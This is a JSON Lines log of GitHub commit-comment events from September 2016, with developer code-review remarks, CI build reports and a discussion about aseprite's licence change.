{"id":"4503203051","type":"CommitCommentEvent","actor":{"login":"Cilenco"},"repo":{"name":"Cilenco/FeatureDiscovery"},"payload":{"comment":{"id":18865315,"position":null,"line":null,"path":null,"commit_id":"e2f76946a68f4bfeabc762775b88d013947c7c47","created_at":"2016-09-01T15:12:56Z","updated_at":"2016-09-01T15:12:56Z","body":"Ah okay glad you solved it. I will add a `setColorResource` method to support this soon."}},"created_at":"2016-09-01T15:12:56Z"}
{"id":"4503207224","type":"CommitCommentEvent","actor":{"login":"twatteyne"},"repo":{"name":"openwsn-berkeley/openwsn-sw"},"payload":{"comment":{"id":18865323,"position":null,"line":null,"path":null,"commit_id":"ab8383935bfa5e228df7df22ea2b53339b37816b","created_at":"2016-09-01T15:13:35Z","updated_at":"2016-09-01T15:13:35Z","body":"awesome, thanks!"}},"created_at":"2016-09-01T15:13:35Z"}
{"id":"4503208533","type":"CommitCommentEvent","actor":{"login":"swansea679"},"repo":{"name":"Evisceration/DeviceControl"},"payload":{"comment":{"id":18865324,"position":5,"line":88,"path":"app/src/main/java/org/namelessrom/devicecontrol/services/BootupService.java","commit_id":"fb56cff8ee83894464575e7314031ac24219b112","created_at":"2016-09-01T15:13:48Z","updated_at":"2016-09-01T15:13:48Z","body":"On"}},"created_at":"2016-09-01T15:13:48Z"}
{"id":"4503209679","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/EPAM-test-mockup"},"payload":{"comment":{"id":18865327,"position":112,"line":115,"path":"Angular/index.html","commit_id":"b3c52d1039a30f1881276ef29cb8af5bf6eeafb2","created_at":"2016-09-01T15:13:59Z","updated_at":"2016-09-01T15:13:59Z","body":"Но если говорить про javascript sort, то весь код можно сильно сократить до\r\n`return a[x].toLowerCase() > b[x].toLowerCase();`"}},"created_at":"2016-09-01T15:13:59Z"}
{"id":"4503212178","type":"CommitCommentEvent","actor":{"login":"Kizoky"},"repo":{"name":"Kizoky/Mr_SmileyII"},"payload":{"comment":{"id":18865333,"position":null,"line":null,"path":null,"commit_id":"2e12477adc770f28f50faf8d5bc5387be0288f38","created_at":"2016-09-01T15:14:21Z","updated_at":"2016-09-01T15:14:21Z","body":"I know what I'am doing. Smiley II is currently nowhere as finished, so small issues like \"that\" is not a problem right now :+1: "}},"created_at":"2016-09-01T15:14:21Z"}
{"id":"4503213898","type":"CommitCommentEvent","actor":{"login":"JeromeMartinez"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865338,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:14:39Z","updated_at":"2016-09-01T15:14:39Z","body":"> Is like saying \"I hope you die.\" Now I know from which side I want to be.\r\n\r\nYou are looking from a developer point of view.\r\nI look from a potential user and from the software points of view, for end user rights, and open source addict: someone wants to kill an open source app (the patch you applied killed an open source app), I hope that the open source software will live.\r\nMaybe the GPL was not the right license for you, because it looks like you are not interested in the freedom of you users. That's a pity.\r\n\r\nYou misinterpreted my sentence: I just hope that you put back the software in open source, and if it is unfortunately not possible I hope that the open source version keep living. Nothing about dying except something you did yourself.\r\n"}},"created_at":"2016-09-01T15:14:39Z"}
{"id":"4503217088","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18865343,"position":96,"line":446,"path":"TX.h","commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T15:15:12Z","updated_at":"2016-09-01T15:15:12Z","body":":-(\r\n\r\nAfter trying and not getting it to work, I had a look into the SoftSerial implementation, and it looks like the implementation only supports the 'usual suspect' speeds:\r\n\r\n```\r\nstatic const DELAY_TABLE table[] PROGMEM =\r\n{\r\n  //  baud    rxcenter    rxintra    rxstop  tx      \r\n  { 115200,   1,          5,         5,      3,      },\r\n  { 57600,    1,          15,        15,     13,     },\r\n  { 38400,    2,          25,        26,     23,     },\r\n  { 31250,    7,          32,        33,     29,     },\r\n  { 28800,    11,         35,        35,     32,     },\r\n  { 19200,    20,         55,        55,     52,     },\r\n  { 14400,    30,         75,        75,     72,     },\r\n  { 9600,     50,         114,       114,    112,    },\r\n  { 4800,     110,        233,       233,    230,    },\r\n  { 2400,     229,        472,       472,    469,    },\r\n  { 1200,     467,        948,       948,    945,    },\r\n  { 600,      948,        1895,      1895,   1890,   },\r\n  { 300,      1895,       3805,      3805,   3802,   },\r\n};\r\n```\r\n\r\nThat's particularly unhelpful in our case, since the PPM pin can not easily be set to output anything that is not a factor of 1000000. If you enter a bit rate that is not on the table, SoftSerial will just quietly do nothing.\r\n\r\nI suspect that if we want to get this to work, we will have to do it with our own clone of the SoftSerial library (which we probably would have had to do anyway, since SoftSerial also does not support 8E2.\r\n\r\nBut I still think it's a good idea."}},"created_at":"2016-09-01T15:15:12Z"}
{"id":"4503219400","type":"CommitCommentEvent","actor":{"login":"swansea679"},"repo":{"name":"Evisceration/DeviceControl"},"payload":{"comment":{"id":18865349,"position":null,"line":null,"path":null,"commit_id":"fb56cff8ee83894464575e7314031ac24219b112","created_at":"2016-09-01T15:15:31Z","updated_at":"2016-09-01T15:15:31Z","body":"fb56cff"}},"created_at":"2016-09-01T15:15:31Z"}
{"id":"4503221275","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Deimoslink/EPAM-test-mockup"},"payload":{"comment":{"id":18865352,"position":33,"line":33,"path":"Angular/index.html","commit_id":"b3c52d1039a30f1881276ef29cb8af5bf6eeafb2","created_at":"2016-09-01T15:15:49Z","updated_at":"2016-09-01T15:15:49Z","body":"Тогда здесь в ng-repeat можно `<tr ng-repeat=\"friend in friends | orderBy: orderKey\">`\r\nА при клике менять orderKey и, если нужно, направление сортировки, которое также передавать в фильтр."}},"created_at":"2016-09-01T15:15:49Z"}
{"id":"4503227516","type":"CommitCommentEvent","actor":{"login":"mikeller"},"repo":{"name":"universam1/openLRSng"},"payload":{"comment":{"id":18865365,"position":null,"line":null,"path":null,"commit_id":"c4d966bdc04755eb56506813d61dae8ed7e05730","created_at":"2016-09-01T15:16:46Z","updated_at":"2016-09-01T15:16:46Z","body":"Also, in order to make `make` work on my system, I've had to amend L112 in `Makefile` as follows:\r\n\r\n```\r\nARDUINO_LIBS=SoftwareSerial\r\n```"}},"created_at":"2016-09-01T15:16:46Z"}
{"id":"4503227895","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18865367,"position":299,"line":299,"path":"main.js","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-01T15:16:50Z","updated_at":"2016-09-01T15:16:50Z","body":"`if ($window.confirm( 'Удалить?' )) { ... }`\r\nНезачем тут создавать переменную."}},"created_at":"2016-09-01T15:16:50Z"}
{"id":"4503227940","type":"CommitCommentEvent","actor":{"login":"Akira1San"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18865368,"position":null,"line":null,"path":null,"commit_id":"2846e2eadfbb6f59a163a6c2ed49df904a1fd724","created_at":"2016-09-01T15:16:50Z","updated_at":"2016-09-01T15:16:50Z","body":"Is this branch ready for testing?"}},"created_at":"2016-09-01T15:16:50Z"}
{"id":"4503228083","type":"CommitCommentEvent","actor":{"login":"Aerim"},"repo":{"name":"Cilenco/FeatureDiscovery"},"payload":{"comment":{"id":18865369,"position":null,"line":null,"path":null,"commit_id":"e2f76946a68f4bfeabc762775b88d013947c7c47","created_at":"2016-09-01T15:16:51Z","updated_at":"2016-09-01T15:16:51Z","body":"Awesome! Keep up the good work!"}},"created_at":"2016-09-01T15:16:51Z"}
{"id":"4503229092","type":"CommitCommentEvent","actor":{"login":"lunaryorn"},"repo":{"name":"flycheck/flycheck"},"payload":{"comment":{"id":18865371,"position":null,"line":null,"path":null,"commit_id":"a8475a82177d30cb51480313eddaafb3d2d9aa79","created_at":"2016-09-01T15:17:01Z","updated_at":"2016-09-01T15:17:01Z","body":"@cpitclaudel Looks as if this broke Travis in `make specs`.  Can you take a look?"}},"created_at":"2016-09-01T15:17:01Z"}
{"id":"4503230660","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18865375,"position":277,"line":277,"path":"main.js","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-01T15:17:16Z","updated_at":"2016-09-01T15:17:16Z","body":"Выравнивание кода поехало.\r\n"}},"created_at":"2016-09-01T15:17:16Z"}
{"id":"4503231125","type":"CommitCommentEvent","actor":{"login":"jtsternberg"},"repo":{"name":"woothemes/storefront"},"payload":{"comment":{"id":18865376,"position":5,"line":32,"path":"functions.php","commit_id":"937a7860f57be3fece384acba116080de67f3f7f","created_at":"2016-09-01T15:17:20Z","updated_at":"2016-09-01T15:17:20Z","body":"Thanks. 😳"}},"created_at":"2016-09-01T15:17:20Z"}
{"id":"4503234653","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865385,"position":null,"line":null,"path":null,"commit_id":"842775a06412ea7eb117e4f9e96a25c44cbb9ddb","created_at":"2016-09-01T15:17:54Z","updated_at":"2016-09-01T15:17:54Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 893](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12249&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **FAILURE**\nSummary: Tests failed: 1, passed: 189, ignored: 3 Build time: 00:07:27\n### Failed tests\n```\norg.genivi.sota.device_registry.test.DeviceResourceSpec: <no details avaliable>\n\n```\n"}},"created_at":"2016-09-01T15:17:54Z"}
{"id":"4503236373","type":"CommitCommentEvent","actor":{"login":"dmfs"},"repo":{"name":"dmfs/http-client-essentials-suite"},"payload":{"comment":{"id":18865392,"position":5,"line":17,"path":".idea/misc.xml","commit_id":"aed8d781282c305102ee3f16ab69d7fb74d28dad","created_at":"2016-09-01T15:18:12Z","updated_at":"2016-09-01T15:18:12Z","body":"Why did you change the classes directory?"}},"created_at":"2016-09-01T15:18:12Z"}
{"id":"4503237381","type":"CommitCommentEvent","actor":{"login":"panzergame"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":18865394,"position":null,"line":null,"path":null,"commit_id":"2846e2eadfbb6f59a163a6c2ed49df904a1fd724","created_at":"2016-09-01T15:18:21Z","updated_at":"2016-09-01T15:18:21Z","body":"@Akira1San : This branch is very unstable for the moment."}},"created_at":"2016-09-01T15:18:21Z"}
{"id":"4503237957","type":"CommitCommentEvent","actor":{"login":"GregoryLundberg"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":18865397,"position":null,"line":null,"path":null,"commit_id":"22763798c7ed840c221f2aaef4b799d29044651e","created_at":"2016-09-01T15:18:26Z","updated_at":"2016-09-01T15:18:26Z","body":"type_tree=\"White Mage\" does not see either \"Mage\" or \"White Mage\" .. bet if I had a \"White\" unit it would work ..."}},"created_at":"2016-09-01T15:18:26Z"}
{"id":"4503240565","type":"CommitCommentEvent","actor":{"login":"amadden80"},"repo":{"name":"arianadziedzic/pickUpSticks"},"payload":{"comment":{"id":18865400,"position":null,"line":null,"path":null,"commit_id":"bad36ab67fc0094e154039a6626cd81ddb259305","created_at":"2016-09-01T15:18:51Z","updated_at":"2016-09-01T15:18:51Z","body":"That's a great process.   Forget my comment!  I just wanted to dive in."}},"created_at":"2016-09-01T15:18:51Z"}
{"id":"4503241434","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18865401,"position":270,"line":270,"path":"main.js","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-01T15:18:58Z","updated_at":"2016-09-01T15:18:58Z","body":"Получается слишком много условий в if, можно завернуть  в отдельный метод."}},"created_at":"2016-09-01T15:18:58Z"}
{"id":"4503244089","type":"CommitCommentEvent","actor":{"login":"FRidh"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":18865407,"position":null,"line":null,"path":null,"commit_id":"5ce6cd0106242648ccc9e7ea64716a866eca152c","created_at":"2016-09-01T15:19:23Z","updated_at":"2016-09-01T15:19:23Z","body":"your turn again\r\nhttps://travis-ci.org/NixOS/nixpkgs/jobs/156839399"}},"created_at":"2016-09-01T15:19:23Z"}
{"id":"4503244784","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18865409,"position":245,"line":245,"path":"main.js","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-01T15:19:30Z","updated_at":"2016-09-01T15:19:30Z","body":"==="}},"created_at":"2016-09-01T15:19:30Z"}
{"id":"4503245237","type":"CommitCommentEvent","actor":{"login":"htgoebel"},"repo":{"name":"pyinstaller/pyinstaller"},"payload":{"comment":{"id":18865411,"position":null,"line":null,"path":null,"commit_id":"fa71f4420bd0b617f4f7d45a2d5c4fe2bbeeebb4","created_at":"2016-09-01T15:19:34Z","updated_at":"2016-09-01T15:19:34Z","body":"The marker is relevant so we can spot places to be improved when we drop support for Python 2 (somewhen). We always try to keep the code clean and removing unused backward-combatibility code is important."}},"created_at":"2016-09-01T15:19:34Z"}
{"id":"4503246129","type":"CommitCommentEvent","actor":{"login":"fbormann"},"repo":{"name":"amadeusproject/amadeuslms"},"payload":{"comment":{"id":18865412,"position":null,"line":null,"path":null,"commit_id":"b2b7877cc44bdbd130d16f7950bac507ac81bddc","created_at":"2016-09-01T15:19:41Z","updated_at":"2016-09-01T15:19:41Z","body":"No index, eu tirei o erro do Merge que fiz na minha máquina, não chequei se ainda existiam HEAD. corrigido neste commit também."}},"created_at":"2016-09-01T15:19:41Z"}
{"id":"4503247314","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865418,"position":null,"line":null,"path":null,"commit_id":"9846c926813d75eabb319cb46011043e1b26735f","created_at":"2016-09-01T15:19:52Z","updated_at":"2016-09-01T15:19:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 894](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12252&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 234, ignored: 3 Build time: 00:09:25"}},"created_at":"2016-09-01T15:19:52Z"}
{"id":"4503252408","type":"CommitCommentEvent","actor":{"login":"MartelliEnrico"},"repo":{"name":"mellotanica/uARM"},"payload":{"comment":{"id":18865428,"position":null,"line":null,"path":null,"commit_id":"8b10fc0270ea1e5272990003a0cedc011a8a2722","created_at":"2016-09-01T15:20:39Z","updated_at":"2016-09-01T15:20:39Z","body":"Wouldn't it be better to split elf2arm into separate files, one for uarm and one for mkdev? This will remove the need for the clean to prevent the compiler errors."}},"created_at":"2016-09-01T15:20:39Z"}
{"id":"4503255922","type":"CommitCommentEvent","actor":{"login":"BorisCor"},"repo":{"name":"BorisCor/ph"},"payload":{"comment":{"id":18865434,"position":1,"line":1,"path":"asdf.txt","commit_id":"456820b0aa1206db0c53ed9fed07fb92ca08b995","created_at":"2016-09-01T15:21:13Z","updated_at":"2016-09-01T15:21:13Z","body":"qweqew"}},"created_at":"2016-09-01T15:21:13Z"}
{"id":"4503257418","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18865439,"position":44,"line":44,"path":"main.js","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-01T15:21:25Z","updated_at":"2016-09-01T15:21:25Z","body":"Не нужно здесь изменять CSS-свойства. Можно добавлять/удалять CSS-класс, а все стили написать во внешнем файле."}},"created_at":"2016-09-01T15:21:25Z"}
{"id":"4503262024","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18865447,"position":50,"line":50,"path":"main.js","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-01T15:22:05Z","updated_at":"2016-09-01T15:22:05Z","body":"Нехорошо из директивы обращаться к DOM-у вне директивы."}},"created_at":"2016-09-01T15:22:05Z"}
{"id":"4503263996","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18865449,"position":54,"line":54,"path":"main.js","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-01T15:22:25Z","updated_at":"2016-09-01T15:22:25Z","body":"`if (scope.list) { ... }`"}},"created_at":"2016-09-01T15:22:25Z"}
{"id":"4503266599","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/angular-ToDo"},"payload":{"comment":{"id":18865454,"position":65,"line":65,"path":"main.js","commit_id":"50e96cd7ecf5f2ff9ceb09ca6bca1ca494db7670","created_at":"2016-09-01T15:22:48Z","updated_at":"2016-09-01T15:22:48Z","body":"ng-click в темплейте"}},"created_at":"2016-09-01T15:22:48Z"}
{"id":"4503268102","type":"CommitCommentEvent","actor":{"login":"danhalliday"},"repo":{"name":"web-workshop-ltd/landing-page-1G"},"payload":{"comment":{"id":18865461,"position":6,"line":6,"path":"site/leigh.html","commit_id":"fa23e18ca823b7c280d33d4e3755fa984badc0d1","created_at":"2016-09-01T15:23:02Z","updated_at":"2016-09-01T15:23:02Z","body":"This isn't really relevant to a page like this. You can use things like `<link rel=\"author\">` (see: https://html.spec.whatwg.org/multipage/semantics.html#link-type-author) but all that really refers to things like blogs where there's _content_ that has a specific author."}},"created_at":"2016-09-01T15:23:02Z"}
{"id":"4503269105","type":"CommitCommentEvent","actor":{"login":"moble"},"repo":{"name":"arsenovic/clifford"},"payload":{"comment":{"id":18865464,"position":null,"line":null,"path":null,"commit_id":"b8884d88f703b94906662a6c1673af043777f7b5","created_at":"2016-09-01T15:23:12Z","updated_at":"2016-09-01T15:23:12Z","body":"Fred, this result isn't typical.  I've never seen anything like this, even when using Xcode myself.  If you look at [your own copy of the repository](https://github.com/FredLunnon/clifford), you can click on the \"Latest commit\" to see the [changes that you made](https://github.com/FredLunnon/clifford/commit/b8884d88f703b94906662a6c1673af043777f7b5).  Github shows that it's just some weird binary file, which is not what `__init__.py` should be; it should just be a plain text file.  So Xcode must be screwing something up for you.  Maybe it would be easier to edit directly on github.com.\r\n\r\nAlso, I think arsenovic is saying that it's better to report bugs by clicking on [\"Issues\"](https://github.com/arsenovic/clifford/issues) in *his* copy of the repository, clicking the \"New issue\" button, and writing your bug report there.  Usually, it's one issue for each bug, but if they're small or closely related you might combine them into a single issue.\r\n\r\nGithub and git are actually really great tools, if you just put in a little bit of time learning how to use them.  I know that it's easy to go wrong.  (E.g., I think Brombo's main problem is that he simply doesn't `git pull` new pull requests to his own repo before he starts in on new edits, or `git push` before he merges a new pull request.)  And once you've gone wrong, it's not obvious how to straighten out.  But if you follow the directions, these tools really are simple.  There are lots of tutorials (including videos) if you google for them."}},"created_at":"2016-09-01T15:23:12Z"}
{"id":"4503269604","type":"CommitCommentEvent","actor":{"login":"nkimble"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18865465,"position":69,"line":124,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T15:23:16Z","updated_at":"2016-09-01T15:23:16Z","body":"Changed to just use the int value."}},"created_at":"2016-09-01T15:23:16Z"}
{"id":"4503270226","type":"CommitCommentEvent","actor":{"login":"nkimble"},"repo":{"name":"CU-CommunityApps/cu-kfs"},"payload":{"comment":{"id":18865469,"position":70,"line":125,"path":"src/main/java/edu/cornell/kfs/pdp/batch/service/impl/PayeeACHAccountExtractServiceImpl.java","commit_id":"2b4520d279a12f580c88f0b32d9c9827d7f837d7","created_at":"2016-09-01T15:23:21Z","updated_at":"2016-09-01T15:23:21Z","body":"Changed to just use the int value."}},"created_at":"2016-09-01T15:23:21Z"}
{"id":"4503270757","type":"CommitCommentEvent","actor":{"login":"pooyeah"},"repo":{"name":"pooyeah/pooyeah.github.io"},"payload":{"comment":{"id":18865472,"position":null,"line":null,"path":null,"commit_id":"67cc42efe4da07cdcb3266e10f9465ab47a34f21","created_at":"2016-09-01T15:23:25Z","updated_at":"2016-09-01T15:23:25Z","body":"pooyeah.github.io\r\nfor www.pooyeah.com by chris"}},"created_at":"2016-09-01T15:23:25Z"}
{"id":"4503271217","type":"CommitCommentEvent","actor":{"login":"steniente"},"repo":{"name":"steniente/hello-world"},"payload":{"comment":{"id":18865473,"position":null,"line":null,"path":null,"commit_id":"ff9951fcd879fd237f477274699c5bad0ed49e76","created_at":"2016-09-01T15:23:29Z","updated_at":"2016-09-01T15:23:29Z","body":"There is still an error in \"type\" I will go back and fix it."}},"created_at":"2016-09-01T15:23:29Z"}
{"id":"4503272601","type":"CommitCommentEvent","actor":{"login":"farvardin"},"repo":{"name":"aseprite/aseprite"},"payload":{"comment":{"id":18865476,"position":null,"line":null,"path":null,"commit_id":"5ecc356a41c8e29977f8608d8826489d24f5fa6c","created_at":"2016-09-01T15:23:42Z","updated_at":"2016-09-01T15:23:42Z","body":"> it looks like you are not interested in the freedom of you users\r\n\r\nwell, as a user I can still download the source, compile it, use the program, I'm ok with that. And I can do whatever I want of the sources as long as I don't redistribute the modifications and the binaries.\r\n\r\nWith the GPL I can do whatever I want of the sources as long as I don't redistribute the modifications and the binaries as well. If I want to redistribute the modifications, I must comply with the GPL strict requirements (for example keep the licence as GPL, I'm not free to change to licence, or I'm not free to redistribute the modified sources without the binaries)\r\n\r\n\r\n"}},"created_at":"2016-09-01T15:23:42Z"}
{"id":"4503273202","type":"CommitCommentEvent","actor":{"login":"sun11"},"repo":{"name":"wg-perception/linemod"},"payload":{"comment":{"id":18865477,"position":null,"line":null,"path":null,"commit_id":"5d06f074ea98580d67916800ecc7f53342e2df48","created_at":"2016-09-01T15:23:48Z","updated_at":"2016-09-01T15:23:48Z","body":"Deleting this line caused an error for me, said \"lassimp_devel\" cannot be found. Then i reverted to the previous version, it was fixed..."}},"created_at":"2016-09-01T15:23:48Z"}
{"id":"4503274665","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Feuerman/task11_ToDo_Angular"},"payload":{"comment":{"id":18865478,"position":38,"line":38,"path":"app.js","commit_id":"b6b533d32dea18dd28e3349275f5c11bab3e5bf9","created_at":"2016-09-01T15:24:01Z","updated_at":"2016-09-01T15:24:01Z","body":"`===`"}},"created_at":"2016-09-01T15:24:01Z"}
{"id":"4503275665","type":"CommitCommentEvent","actor":{"login":"DomT4"},"repo":{"name":"curl/curl"},"payload":{"comment":{"id":18865482,"position":null,"line":null,"path":null,"commit_id":"152e5c2105aa6b4701923b11096fcc30284ea848","created_at":"2016-09-01T15:24:10Z","updated_at":"2016-09-01T15:24:10Z","body":">  can you confirm\r\n\r\nFor the OS X image you're using, it will have been yeah. Travis defaults to 10.9 currently for the `osx` box, and Homebrew's bottles for 10.9 are built using Xcode 6.2 as that was the last supported Xcode for Mavericks. Bottles for Yosemite are built using Xcode 7.2.1, and El Capitan uses 7.3.1."}},"created_at":"2016-09-01T15:24:10Z"}
{"id":"4503277592","type":"CommitCommentEvent","actor":{"login":"JoinRajuncraftNow"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18865487,"position":null,"line":null,"path":null,"commit_id":"8bcaee4f51a7842e76aceb87e2c073fd7988152a","created_at":"2016-09-01T15:24:26Z","updated_at":"2016-09-01T15:24:26Z","body":"We could make the text adventure in TI Basic on Github. XD"}},"created_at":"2016-09-01T15:24:26Z"}
{"id":"4503277715","type":"CommitCommentEvent","actor":{"login":"jaeko44"},"repo":{"name":"megamsys/nilavu"},"payload":{"comment":{"id":18865488,"position":1,"line":1,"path":"app/assets/stylesheets/desktop/presignup.scss","commit_id":"b2ae33eaeb75af2390c579b414a23d06763a8eb4","created_at":"2016-09-01T15:24:27Z","updated_at":"2016-09-01T15:24:27Z","body":"Removing this will break the other pages. We can just tag presignup div container with this ID so we can use this css styles inside and avoid breaking other pages. @vinomca-megam "}},"created_at":"2016-09-01T15:24:27Z"}
{"id":"4503278112","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Feuerman/task11_ToDo_Angular"},"payload":{"comment":{"id":18865490,"position":52,"line":52,"path":"app.js","commit_id":"b6b533d32dea18dd28e3349275f5c11bab3e5bf9","created_at":"2016-09-01T15:24:31Z","updated_at":"2016-09-01T15:24:31Z","body":"`return new Date(str);` – необязательно создавать дополнительную переменную"}},"created_at":"2016-09-01T15:24:31Z"}
{"id":"4503281374","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"Feuerman/task11_ToDo_Angular"},"payload":{"comment":{"id":18865498,"position":72,"line":72,"path":"app.js","commit_id":"b6b533d32dea18dd28e3349275f5c11bab3e5bf9","created_at":"2016-09-01T15:25:02Z","updated_at":"2016-09-01T15:25:02Z","body":"Выравнивание кода поехало."}},"created_at":"2016-09-01T15:25:02Z"}
{"id":"4503281960","type":"CommitCommentEvent","actor":{"login":"NetDEF-CI"},"repo":{"name":"opensourcerouting/quagga"},"payload":{"comment":{"id":18865501,"position":null,"line":null,"path":null,"commit_id":"c5ce85e9c8125b0173316d5eac9a73a99854a12f","created_at":"2016-09-01T15:25:09Z","updated_at":"2016-09-01T15:25:09Z","body":"# Continous Integration Result: SUCCESSFUL\n\nCongratulations, this patch passed basic tests\n\nTested-by: NetDEF / OpenSourceRouting.org CI System\n\n__CI System Testrun URL: https://ci1.netdef.org/browse/QUAGGA-GITHUBOSRQUAGGA-116/__\n\nThis is a comment from an EXPERIMENTAL automated CI system.\nFor questions and feedback in regards to this CI system, please feel free to email\nMartin Winter - mwinter (at) opensourcerouting.org.\n\n"}},"created_at":"2016-09-01T15:25:09Z"}
{"id":"4503304247","type":"CommitCommentEvent","actor":{"login":"Yugiilay"},"repo":{"name":"Yugiilay/PPM"},"payload":{"comment":{"id":18865538,"position":null,"line":null,"path":null,"commit_id":"7598d5c106986be825bb6921bde766c401cbdfd0","created_at":"2016-09-01T15:28:37Z","updated_at":"2016-09-01T15:28:37Z","body":"增加模板模糊查询"}},"created_at":"2016-09-01T15:28:37Z"}
{"id":"4503304984","type":"CommitCommentEvent","actor":{"login":"tde-banana-odoo"},"repo":{"name":"odoo/odoo"},"payload":{"comment":{"id":18865539,"position":null,"line":null,"path":null,"commit_id":"c3f81c527ddb5153f5a1eceb5e87efeb533129b0","created_at":"2016-09-01T15:28:43Z","updated_at":"2016-09-01T15:28:43Z","body":"Does not seem correct to me."}},"created_at":"2016-09-01T15:28:43Z"}
{"id":"4503305618","type":"CommitCommentEvent","actor":{"login":"cpitclaudel"},"repo":{"name":"flycheck/flycheck"},"payload":{"comment":{"id":18865543,"position":null,"line":null,"path":null,"commit_id":"a8475a82177d30cb51480313eddaafb3d2d9aa79","created_at":"2016-09-01T15:28:49Z","updated_at":"2016-09-01T15:28:49Z","body":"Yup, looking at it right now"}},"created_at":"2016-09-01T15:28:49Z"}
{"id":"4503306179","type":"CommitCommentEvent","actor":{"login":"cpitclaudel"},"repo":{"name":"flycheck/flycheck"},"payload":{"comment":{"id":18865546,"position":null,"line":null,"path":null,"commit_id":"a8475a82177d30cb51480313eddaafb3d2d9aa79","created_at":"2016-09-01T15:28:54Z","updated_at":"2016-09-01T15:28:54Z","body":"Sorry :/\r\n"}},"created_at":"2016-09-01T15:28:54Z"}
{"id":"4503306814","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18865549,"position":18,"line":420,"path":"application/src/main/webapp/js/notif.js","commit_id":"6a25bae752f28e2f4b3ca98bb01c46f0af3790ce","created_at":"2016-09-01T15:29:01Z","updated_at":"2016-09-01T15:29:01Z","body":"Indentation"}},"created_at":"2016-09-01T15:29:01Z"}
{"id":"4503307568","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18865555,"position":null,"line":null,"path":null,"commit_id":"7f3eced6e67f4e18960bfb94a977de7b814f9b55","created_at":"2016-09-01T15:29:10Z","updated_at":"2016-09-01T15:29:10Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 895](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12261&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-01T15:29:10Z"}
{"id":"4503309280","type":"CommitCommentEvent","actor":{"login":"thomasdelhomenie"},"repo":{"name":"exo-addons/chat-application"},"payload":{"comment":{"id":18865562,"position":25,"line":427,"path":"application/src/main/webapp/js/notif.js","commit_id":"6a25bae752f28e2f4b3ca98bb01c46f0af3790ce","created_at":"2016-09-01T15:29:24Z","updated_at":"2016-09-01T15:29:24Z","body":"Can you add bracket for if and else please, it will make it more readable."}},"created_at":"2016-09-01T15:29:24Z"}
